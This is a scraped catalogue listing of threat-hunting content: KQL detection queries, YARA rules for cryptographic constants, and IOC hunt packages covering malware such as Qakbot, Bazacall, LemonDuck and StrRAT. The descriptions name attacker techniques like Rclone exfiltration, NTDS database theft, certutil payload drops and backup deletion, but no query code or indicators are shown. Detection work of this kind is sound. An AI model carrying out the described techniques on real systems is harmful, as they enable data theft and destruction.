Alerts related to Log4j vulnerability
kql medium
Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.
app-armor-stopped
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
Aria SBox 2
yara low
Aria SBox 2
Look for Base64 table
yara low
Look for Base64 table
BigDig bpInit
yara low
BigDig bpInit
BigDig mpModExp
yara low
BigDig mpModExp
BigDig mpModInv
yara low
BigDig mpModInv
BigDig mpModMult
yara low
BigDig mpModMult
BigDig mpModulo
yara low
BigDig mpModulo
BigDig spModExpB
yara low
BigDig spModExpB
BigDig spModInv
yara low
BigDig spModInv
BigDig spModMult
yara low
BigDig spModMult
Look for 128-bit key Chacha stream cipher constant
Look for 256-bit key Chacha stream cipher constant
CryptoPP ApplyFunction
yara low
CryptoPP ApplyFunction
CryptoPP Integer constructor
yara low
CryptoPP Integer constructor
CryptoPP RsaFunction
yara low
CryptoPP RsaFunction
Look for DCP Blowfish EncryptCBC
yara low
Look for DCP Blowfish EncryptCBC
Look for DCP Blowfish Init
yara low
Look for DCP Blowfish Init
Look for DCP Des EncryptECB
yara low
Look for DCP Des EncryptECB
Look for DCP Des Init
yara low
Look for DCP Des Init
Look for DCP RijnDael EncryptECB
yara low
Look for DCP RijnDael EncryptECB
Look for DCP RijnDael Init
yara low
Look for DCP RijnDael Init
deimos-component-execution
kql medium
DeviceEvents
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Look for Compare string function
yara low
Look for Compare string function
Look for Copy function
yara low
Look for Copy function
Look for DecodeDate (DecodeDateFully) function
Look for Form.Show function
yara low
Look for Form.Show function
Look for IntToStr function
yara low
Look for IntToStr function
Look for Random function
yara low
Look for Random function
Look for RandomRange function
yara low
Look for RandomRange function
Look for StrToInt function
yara low
Look for StrToInt function
AlertEvidence
Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.
Disable Controlled Folders
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.
Dopplepaymer In-Memory Malware Implant
kql medium
DeviceProcessEvents
Dopplepaymer In-Memory Malware Implant. This query identifies processes with command line launch strings. Which match the pattern used in Dopplepaymer ransomware attacks.
Dragon Fly
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml. Questions via Twitter: @janvonkirchheim.
Elise backdoor
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml. Questions via Twitter: @janvonkirchheim.
Equation Group C2 Communication
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml. Questions via Twitter: @janvonkirchheim.
evasive-powershell-executions
kql medium
DeviceProcessEvents
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
evasive-powershell-strings
kql medium
DeviceProcessEvents
This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query
Excel launching anomalous processes
kql medium
DeviceProcessEvents
Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indic
FGint RsaSign
yara low
FGint RsaSign
General attempts to access local email store
kql medium
DeviceFileEvents
Use this query to find attempts to access files in the local path containing Outlook emails.
Hurricane Panda activity
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml. Questions via Twitter: @janvonkirchheim.
Identify EUROPIUM IOCs
kql medium
DeviceFileEvents
The following query can locate activity possibly associated with the EUROPIUM threat actor
AlertEvidence
This query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor
DeviceProcessEvents
This query looks for identity add through exchange PowerShell
Imminent Ransomware
kql medium
DeviceProcessEvents
Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.
Judgement Panda exfil activity
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml. Questions via Twitter: @janvonkirchheim.
KNOTWEED-AV Detections
kql medium
AlertEvidence
'This query looks for Microsoft Defender Antivirus detections with the family names used by KNOTWEED'
DeviceRegistryEvents
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
KNOTWEED-Domain IOCs
kql medium
DeviceNetworkEvents
'This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections'
KNOTWEED-Downloading new file using Curl
kql medium
DeviceNetworkEvents
'This query looks for new files being downloaded using Curl.'
KNOTWEED-File Hash IOCs
kql medium
'This query identifies matches based on KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables'
DeviceFileEvents
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
LemonDuck-competition-killer
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-component-download-structure
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-component-names
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-control-structure
kql medium
DeviceNetworkEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-defender-exclusions
kql medium
DeviceProcessEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-email-subjects
kql medium
EmailEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-id-generation
kql medium
DeviceNetworkEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck-registration-function
kql medium
DeviceEvents
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LockBox DecryptRsaEx
yara low
LockBox DecryptRsaEx
LockBox EncryptRsaEx
yara low
LockBox EncryptRsaEx
LockBox RsaEncryptFile
yara low
LockBox RsaEncryptFile
LockBox TlbRsaKey
yara low
LockBox TlbRsaKey
MacOceanLotusBackdoor
kql medium
DeviceProcessEvents
Backdoor processes associated with OceanLotus Mac Malware Backdoor. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS platform
MacOceanLotusDropper
kql medium
DeviceProcessEvents
Backdoor processes associated with OceanLotus Mac malware backdoor dropper. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS
Mass account password change
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impeded recovery effort
Miracl Big constructor
yara low
Miracl Big constructor
Miracl mirsys init
yara low
Miracl mirsys init
Miracl mirvar
yara low
Miracl mirvar
OceanLotus registry activity
kql medium
DeviceRegistryEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml. Questions via Twitter: @janvonkirchheim.
OpenSSL BN_mod_exp_inverse
yara low
OpenSSL BN_mod_exp_inverse
OpenSSL BN_mod_exp_mont
yara low
OpenSSL BN_mod_exp_mont
OpenSSL BN_mod_exp_recp
yara low
OpenSSL BN_mod_exp_recp
OpenSSL BN_mod_exp_simple
yara low
OpenSSL BN_mod_exp_simple
OpenSSL BN_mod_exp2_mont
yara low
OpenSSL BN_mod_exp2_mont
OpenSSL DSA
yara low
YARA rule: OpenSSL_DSA
YARA rule: pkcs8_private_key_information_syntax_standard
PSExec Attrib commands
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, adversaries wil use Attrib to display file attribute information on multiple drives and all subfolders.
Qakbot Craigslist Domains
kql medium
DeviceNetworkEvents
Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is i
Qakbot email theft (1)
kql medium
DeviceFileEvents
Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Qakbot email theft
kql medium
DeviceFileEvents
Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Qakbot reconnaissance activities
kql medium
DeviceProcessEvents
Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltr
DeviceProcessEvents
Find use of Alternate Data Streams (ADS) for anti-forensic purposes. Alternate Data Streams execution.
Ransomware hits healthcare - Backup deletion
kql medium
AlertEvidence
Adversaries are likely attempting to delete backup files in healthcare environments to eliminate recovery options
DeviceProcessEvents
// Look for cipher.exe deleting data from multiple drives. This is often performed as an anti-forensic measure prior to encryption.
DeviceProcessEvents
// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.
AlertEvidenceDeviceLogonEvents
Identify accounts that have logged on to affected endpoints. Check for specific alerts.
DeviceProcessEvents
Find distinct evasion and execution activities. Associated with the Robbinhood ransomware campaign.
DeviceProcessEvents
Find attempts to stop System Restore and. Prevent the system from creating restore points.
DeviceFileEvents
Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools.
RijnDael AES
yara low
RijnDael AES
RijnDael AES (check2) [char]
yara low
RijnDael AES (check2) [char]
RijnDael AES S-inv [char]
yara low
RijnDael AES S-inv [char]
RsaEuro NN_modInv
yara low
RsaEuro NN_modInv
RsaEuro NN_modMult
yara low
RsaEuro NN_modMult
RsaRef2 NN_modExp
yara low
RsaRef2 NN_modExp
RsaRef2 NN_modInv
yara low
RsaRef2 NN_modInv
RsaRef2 NN_modMult
yara low
RsaRef2 NN_modMult
RsaRef2 RsaPrivateDecrypt
yara low
RsaRef2 RsaPrivateDecrypt
RsaRef2 RsaPrivateEncrypt
yara low
RsaRef2 RsaPrivateEncrypt
RsaRef2 RsaPublicDecrypt
yara low
RsaRef2 RsaPublicDecrypt
RsaRef2 RsaPublicEncrypt
yara low
RsaRef2 RsaPublicEncrypt
Star Blizzard-Domain IOCs
kql high
T1566
DeviceNetworkEvents
'This query identifies matches based on domain IOCs related to Star Blizzard against Microsoft Defender for Endpoint device network connections'
StrRAT-AV-Discovery
kql medium
DeviceProcessEvents
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
StrRAT-Email-Delivery
kql medium
EmailUrlInfo
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
StrRAT-Malware-Persistence
kql medium
DeviceProcessEvents
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
successive-tk-domain-calls
kql medium
DeviceNetworkEvents
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Suspicious JScript staging comment
kql medium
DeviceProcessEvents
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.
Suspicious PowerShell curl flags
kql medium
DeviceProcessEvents
Attackers may use unconventional PowerShell curl flags
DeviceProcessEvents
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 95 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 3 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 100 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 5 IOCs associated with Unknown RAT
ThreatFox: Amadey IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 3 IOCs associated with Amadey
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Cobalt Strike
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Remcos
ThreatFox: Stealc IOCs
ioc-hunt high
UrlClickEvents
The Stealc malware is a data exfiltration tool designed to steal sensitive information such as credentials and system data from infected hosts. It typically arrives via phishing emails or malicious websites containing malicious URLs that download and execute the payload. SOC analysts should monitor for unusual outbound traffic patterns, unexpected data transfers, and signs of lateral movement or command-and-control communication beyond the identified URLs.
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Vidar
Look for Random function
yara low
Look for Random function
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 51 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as Mozi
URLhaus: ua-wget Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as ua-wget
Use of MSBuild as LOLBin
kql medium
DeviceProcessEvents
Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.
Look for Random function
yara low
Look for Random function
Look for Random function
yara low
Look for Random function
x509 public key infrastructure cert
yara low
YARA rule: x509_public_key_infrastructure_cert
Abuse.ch Recent Threat Feed (1)
kql medium
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
Abuse.ch Recent Threat Feed
kql medium
DeviceFileEventsDeviceImageLoadEventsDeviceProcessEvents
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
Abusing settingcontent-ms
kql medium
DeviceFileEvents
Sample query that search for .settingcontent-ms that has been downloaded from the web. Through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook. For questions @Mila
APT Baby Shark
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml. Questions via Twitter: @janvonkirchheim.
APT29 thinktanks
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml. Questions via Twitter: @janvonkirchheim.
Bazacall Emails
kql medium
EmailEvents
Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to t
Bear Activity GTR 2019
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml. Questions via Twitter: @janvonkirchheim.
Cloud Hopper
kql medium
DeviceProcessEvents
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml. Questions via Twitter: @janvonkirchheim.
Cobalt Strike Lateral Movement
kql medium
AlertEvidence
Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.
DES [long]
yara low
DES [long]
DES [pbox] [long]
yara low
DES [pbox] [long]
DES [sbox]
yara low
DES [sbox]
DofoilNameCoinServerTraffic
kql medium
DeviceNetworkEvents
This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers. The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-d
Dropping payload via certutil
kql medium
DeviceFileEvents
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
Excel file download domain pattern
kql medium
DeviceNetworkEvents
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
Excel Macro Execution
kql medium
DeviceProcessEvents
Bazacall uses malicious macro-enabled Excel documents to execute their payload.
FGint Base256StringToGInt
yara low
FGint Base256StringToGInt
FGint ConvertBase256StringToHexString
FGint ConvertBase256to64
yara low
FGint ConvertBase256to64
FGint ConvertHexStringToBase256String
FGint DSAPrimeSearch
yara low
FGint DSAPrimeSearch
FGint DSASign
yara low
FGint DSASign
FGint DSAVerify
yara low
FGint DSAVerify
FGint ECAddPoints
yara low
FGint ECAddPoints
FGint ECElGamalEncrypt
yara low
FGint ECElGamalEncrypt
FGint ECPointDestroy
yara low
FGint ECPointDestroy
FGint ECPointKMultiple
yara low
FGint ECPointKMultiple
FGint FGIntToBase256String
yara low
FGint FGIntToBase256String
FGint FindPrimeGoodCurveAndPoint
yara low
FGint FindPrimeGoodCurveAndPoint
FGint PGPConvertBase256to64
yara low
FGint PGPConvertBase256to64
FGint RsaDecrypt
yara low
FGint RsaDecrypt
FGint RSAEncrypt
yara low
FGint RSAEncrypt
FGint RSAVerify
yara low
FGint RSAVerify
Malicious Excel Delivery
kql medium
DeviceFileEvents
Bazacall uses malicious Excel files to execute payloads on affected devices.
NTDS theft
kql medium
DeviceProcessEvents
Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.
Renamed Rclone Exfil
kql medium
DeviceProcessEvents
Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.
RunDLL Suspicious Network Connection
kql medium
DeviceNetworkEvents
During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains
Stolen Images Execution
kql medium
DeviceProcessEvents
The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 103 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Unknown malware
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Quasar RAT is
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data, including passwords and browser cookies, by establishing covert communication with command-and-control servers. It typically arrives via phishing emails containing malicious links or compromised websites that deploy the malware through exploit kits or malicious attachments. SOC analysts should monitor for lateral movement indicators, unusual outbound traffic patterns
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 16 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 47 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
ClearFake is a malware family that primarily functions as a data exfiltration tool, leveraging command-and-control (C2) communication to
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a downloader that establishes command-and-control (C2) communication to exfiltrate data and deploy additional payloads. It typically arrives via phishing emails or malicious websites leveraging
Zip-Doc - Creation of JPG Payload File
kql medium
DeviceImageLoadEvents
In the campaign where Bazarloader is delivered via emails containing pw protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.
Zip-Doc - Word Launching MSHTA
kql medium
DeviceProcessEvents
The pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader p
ASR rules categorized detection graph
kql medium
DeviceEvents
This query offers daily categorization of ASR rules, helping SOC analysts monitor specific categories like office-related activities or WMI among the 16 rules. It aids in tracking detection rates and
Cross-service Azure Data Explorer queries
kql medium
T1567
'Under specific circumstances, executing KQL queries can exfiltrate information like access tokens, regarding external data functions like adx(). This query tries to list executed KQL queries that use
Cross workspace query anomolies
kql medium
T1530T1213T1020
'This hunting query looks for increases in the number of workspaces queried by a user.'
CryptoPP a_exp_b_mod_c
yara low
CryptoPP a_exp_b_mod_c
CryptoPP modulo
yara low
CryptoPP modulo
FGint Base10StringToGInt
yara low
FGint Base10StringToGInt
FGint FGIntDivMod
yara low
FGint FGIntDivMod
FGint FGIntDestroy
yara low
FGint FGIntDestroy
FGint FGIntModExp
yara low
FGint FGIntModExp
FGint MontgomeryModExp
yara low
FGint MontgomeryModExp
FGint MulByInt
yara low
FGint MulByInt
GitHub First Time Repo Delete
kql medium
T1485
'This hunting query identifies GitHub activites its the first time a user deleted a repo that may be a sign of compromise.'
T1136
'This hunting query identifies Accounts that are new or inactive and have accessed or used GitHub that may be a sign of compromise.'
GitHub Mass Deletion of repos or projects
kql medium
T1485
'This hunting query identifies GitHub activites where there are a large number of deletions that may be a sign of compromise.'
GitHub OAuth App Restrictions Disabled
kql medium
T1505T1562
'This hunting query identifies GitHub OAuth Apps that have restrictions disabled that may be a sign of compromise. Attacker will want to disable such security tools in order to go undetected. '
GitHub Repo Clone - Time Series Anomly
kql medium
T1213
'Attacker can exfiltrate data from your GitHub repository by cloning it. This hunting query tracks clone activities for each repository, allowing quick identification of anomalies/excessive clones to
GitHub Repo switched from private to public
kql medium
T1213
Adversaries may exploit GitHub's public access to exfiltrate sensitive data or distribute malicious code by converting private repositories to public, leveraging the platform's visibility for covert operations. SOC teams should proactively
GitHub Update Permissions
kql medium
T1098T1562
'This hunting query identifies GitHub activites where permissions are updated that may be a sign of compromise.'
T1098T1078
'This hunting query identifies Accounts in GitHub that have granted access to another account which then grants access to yet another account that may be a sign of compromise.'
Looks for MD5 API
yara low
Looks for MD5 API
Look for MD5 constants
yara low
Look for MD5 constants
Miracl crt
yara low
Miracl crt
Miracl powmod
yara low
Miracl powmod
Multiple large queries made by user
kql medium
T1030
'This hunting query looks for users who are running multiple queries that return either a very large amount of data or the maximum amount allowed by the query method.'
New client running queries
kql medium
T1530T1213T1020
'This hunting query looks for clients running queries that have not previously been seen running queries.'
New ServicePrincipal running queries
kql medium
T1530T1213T1020
'This hunting query looks for new Service Principals running queries that have not previously been seen running queries.'
New users calling sensitive Watchlist
kql medium
T1530T1213
'This hunting query looks for users who have run queries calling a watchlist template relating to sensitive data that have not previously been seen calling these watchlists.'
New users running queries
kql medium
T1530T1213
'This hunting query looks for users who have run queries that have not previously been seen running queries.'
Query data volume anomolies
kql medium
T1030
'This hunting query looks for anomalously large LA queries by users.'
Query looking for secrets
kql medium
T1530T1213
AuditLogsSecurityEventSigninLogs
'This hunting query looks for queries that appear to be looking for secrets or passwords in tables.'
The RC6_Constants rule detects binaries containing RC6 encryption constants, which may indicate malicious activity leveraging the RC6 cipher.
Look for RIPEMD-160 constants
yara low
Look for RIPEMD-160 constants
Look for SHA1 constants
yara low
Look for SHA1 constants
Look for SHA2/BLAKE2/Argon2 IVs
yara low
Look for SHA2/BLAKE2/Argon2 IVs
Look for SHA384/SHA512 constants
yara low
Look for SHA384/SHA512 constants
Look for TEA Encryption
yara low
Look for TEA Encryption
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Kimwolf
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network exploitation, leveraging un
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 77 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with FAKEUPDATES
ThreatFox: KongTuke IOCs
ioc-hunt high
DeviceFileEventsDnsEvents
The KongTuke malware is a data exfiltration tool that establishes
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 36 IOCs associated with Unknown malware
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
The Havoc malware family is designed for data exfiltration and persistence, often leveraging encrypted communication channels to steal sensitive
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 20 IOCs associated with Lumma Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Quasar RAT
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames,
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Vidar is a data exfiltration malware
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "32-bit" malware
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 38 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
User returning more data than daily average
kql medium
T1030
'This hunting query looks for users whose total returned data that is significantly above their average.'
User running multiple queries that fail
kql medium
T1020
'This hunting query looks for users who have multiple failed queries in a short space of time.'
Look for WhirlPool constants
yara low
Look for WhirlPool constants
T1001.002
CommonSecurityLog
'Threat actors can use JPEG files to hide malware, or other malicious code from inspection. This query looks for the downloading of abnormally large JPEG files from a source where large JPEG files hav
Looks for advapi API functions
yara low
Looks for advapi API functions
Azure CloudShell Usage
kql medium
T1059
AzureActivity
'This query look for users starting an Azure CloudShell session and summarizes the Azure Activity from that user account during that timeframe (by default 1 hour). This can be used to help identify ab
Azure Storage File Create, Access, Delete
kql medium
T1537
'This hunting query will identify where a file is uploaded to Azure File or Blob storage and is then accessed once before being deleted. This activity may be indicative of exfiltration activity.'
Azure Storage File Create and Delete
kql medium
T1020T1537
'This hunting query will try to identify instances where a file us uploaded to file storage and then deleted within a given threshold. By default the query will find instances where a file is uploaded
Azure Storage file upload from VPS Providers
kql medium
T1570
'Looks for file uploads actions to Azure File and Blob Storage from known VPS provider network ranges. This is not an exhaustive list of VPS provider ranges but covers some of the most prevalent provi
Azure Storage Mass File Deletion
kql medium
T1485
'Detect mass file deletion events within Azure File and Blob storage. deleteWindow controls the period of time the deletions must occur in, whilst the deleteThreshold controls how many files must be d
Looks for big numbers 20:sized
yara low
Looks for big numbers 20:sized
Looks for big numbers 32:sized
yara low
Detects 32-bit numeric values that may indicate obfuscation
Looks for big numbers 48:sized
yara low
Looks for big numbers 48:sized
